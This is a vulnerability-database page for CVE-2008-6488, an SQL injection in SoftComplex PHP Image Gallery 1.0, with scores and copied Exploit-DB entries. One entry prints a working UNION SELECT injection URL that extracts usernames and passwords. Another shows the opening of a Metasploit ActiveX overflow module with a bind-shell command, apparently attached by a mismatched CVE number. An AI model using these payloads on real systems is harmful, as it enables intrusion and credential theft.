CVE-2008-6488
published 2009-03-18CVE-2008-6488: SQL injection vulnerability in index.php in SoftComplex PHP Image Gallery 1.0 allows remote attackers to execute arbitrary SQL commands via the Admin field in…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in index.php in SoftComplex PHP Image Gallery 1.0 allows remote attackers to execute arbitrary SQL commands via the Admin field in a login action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softcomplex | php_image_gallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SoftComplex PHP Image Gallery - 'ctg' SQL Injection
exploitdb·2008-11-06
CVE-2008-6488 SoftComplex PHP Image Gallery - 'ctg' SQL Injection
SoftComplex PHP Image Gallery - 'ctg' SQL Injection
---
SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : [email protected]
script : http://www.softcomplex.com/products/php_image_gallery/demo2/
ExploiT & demo
http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|__________________________________________________
Exploit-DB
SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
exploitdb·2008-11-06
CVE-2008-6488 SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
---
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!]O O O O O [!]
[!]O O O [!]
[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!]O OOO OOO O O O O OO O O O O OO O O O [!]
[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!]O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO [!]
Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
= Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability =
-= Discovred By : Cyber-Zone =-
-= =-
-= E-mail : [email protected] =-
-= =-
-= Home : WwW.IQ-Ty.CoM =-
Download : http://www.softcomplex.com/products/php_image_gallery/
Exploit-DB
ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
exploitdb·2008-09-25·CVSS 7.5
CVE-2006-6488 [HIGH] ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
---
##
# $Id: iconics_dlgwrapper.rb 1 2008-09-21 22:43:00Z kf $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# $ msfcli exploit/windows/browser/iconics_dlgwrapper RHOST=10.211.55.6 PAYLOAD=windows/shell_bind_tcp E
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Iconics_Dlgwrapper 'ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX DoModal Overflow',
'Description' => %q{
This module exploits a stack overflow in the Iconics Vessel / Gauge / Switch ActiveX controls
},
'Lice
No writeups or analysis indexed.
2009-03-18
Published